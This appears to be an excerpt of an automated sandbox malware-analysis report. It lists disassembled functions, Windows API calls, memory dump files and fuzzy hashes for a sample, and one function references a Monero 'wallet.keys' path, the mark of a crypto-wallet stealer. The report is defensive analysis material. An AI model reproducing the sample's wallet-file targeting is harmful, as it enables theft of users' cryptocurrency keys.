Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: deba2558007b766e04ae69102a69a9a9bf240b52b5759d6358e67163df56df61
Instruction ID: 942a23d920fbb39ddbdeb60789466dad53727978ceba30027a271d629577730e
Opcode Fuzzy Hash: deba2558007b766e04ae69102a69a9a9bf240b52b5759d6358e67163df56df61
Instruction Fuzzy Hash: 0991FE7291010CABDB14EBA4DE96FFE7338AF24304F41456DF507A6191EF346A09CBA2

Function 00ABB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

lstrlen.KERNEL32(00000000), ref: 00ABB42E
lstrlen.KERNEL32(00000000), ref: 00ABB442

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 56deec99ab5d25f4abe76d55a4e76aece0a79e7c0b32ee8db2936a2d7bdc6fae
Instruction ID: 249092dd8b51c4d1fe00e061b6019864401d9fe5448c35e46b18bc26d9c6e275
Opcode Fuzzy Hash: 56deec99ab5d25f4abe76d55a4e76aece0a79e7c0b32ee8db2936a2d7bdc6fae
Instruction Fuzzy Hash: 6871CD7291010C9BDB14EBA4DE96FFE7378BF64304F41451DF506A6192EF346A09CBA2

Function 00AB6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00AB6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00AB6753

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3baf6d0d3a11fa2c151a9ce93c1f838da4c3f345ad926625f33c00f964a2cf48
Instruction ID: 77682d35626f2d0ff1963953f7049dc06bce71209d26c4f5fd02276f25cf770a
Opcode Fuzzy Hash: 3baf6d0d3a11fa2c151a9ce93c1f838da4c3f345ad926625f33c00f964a2cf48
Instruction Fuzzy Hash: 7241B974A00209EFCB44CF58C494BEDBBB5FF48314F248299E9599B356D735AA81CB84

Function 00AC5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC508A
lstrcat.KERNEL32(?,005EF6C0), ref: 00AC50A8

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC492C
Part of subcall function 00AC4910: FindFirstFileA.KERNEL32(?,?), ref: 00AC4943

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: bc4468d2fdf5179348e622d8b82e0740c75623b2ee296d15911afbd7c095c48c
Instruction ID: 0dbdcb61f6c11fb1ea4e6186b18afc4c275861d9175286c9bb5c0119ae0cb2c9
Opcode Fuzzy Hash: bc4468d2fdf5179348e622d8b82e0740c75623b2ee296d15911afbd7c095c48c
Instruction Fuzzy Hash: 800196B6900208A7C754FB70DD42FFE733CAB64340F004548B64E97191EE75AA88CBA3

Function 00AB10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AB10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AB10F7

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 3e57ac36a3f1f1e669ff678016080669aafa99a37dc840bfc8b82f482a28a6c7
Instruction ID: e04d91ba3147bbed57a16086262ece5179cb5c0537c7b4b3e195a271b5352ae2
Opcode Fuzzy Hash: 3e57ac36a3f1f1e669ff678016080669aafa99a37dc840bfc8b82f482a28a6c7
Instruction Fuzzy Hash: F3F0E2B1641208BBE714ABA4AC59FBEF7ECE705B15F300448F508E3281D572AE00CAA1

Function 00AC8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00AB1B54,?,?,00AD564C,?,?,00AD0E1F), ref: 00AC8D9F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fc1a69fd18a3a81e25c513680773e0290414bbce884d5db5c75cbdc8a18834ca
Instruction ID: c8e93ea8d1b5f5ac98a53e52c4601bfde9a2989ff6091031fe518d0542ff0235
Opcode Fuzzy Hash: fc1a69fd18a3a81e25c513680773e0290414bbce884d5db5c75cbdc8a18834ca
Instruction Fuzzy Hash: 49F0A570D0020CEBDB05EFA4D549BECBB74EB10314F11819DE8666B2D0DB786A55DB82

Function 00AC8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: dc9cc66476935961c3c8838b2f84b8b8f5130bf0c0c624a4e880fa9701ce21c0
Instruction ID: 2858c2a28381f3467f3c6f49f4241f328439b87e57308f9c54a29dc78a5e6d53
Opcode Fuzzy Hash: dc9cc66476935961c3c8838b2f84b8b8f5130bf0c0c624a4e880fa9701ce21c0
Instruction Fuzzy Hash: D2E0127194034C6BDB51DB50CC96FAD737CAB44B11F004295BA0C5B1C0DE70AB858B91

Function 00AB1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00AC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7910
Part of subcall function 00AC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7917
Part of subcall function 00AC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AC792F

Part of subcall function 00AC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AB11B7), ref: 00AC7880
Part of subcall function 00AC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7887
Part of subcall function 00AC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AC789F

ExitProcess.KERNEL32 ref: 00AB11C6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 705f3f48e3a81960e1c131349d5cdae6351c6f0c44bac4527e6858dc772d9256
Instruction ID: 7ed184c9e7bf151f6f29cf5d6c8125f842421a42828c90e900a06299c54e86e9
Opcode Fuzzy Hash: 705f3f48e3a81960e1c131349d5cdae6351c6f0c44bac4527e6858dc772d9256
Instruction Fuzzy Hash: DBE0C2F590030113CA0033B9BD0AF3E328C6B04385F06042CFA09C2103FA28F840CA67

Non-executed Functions

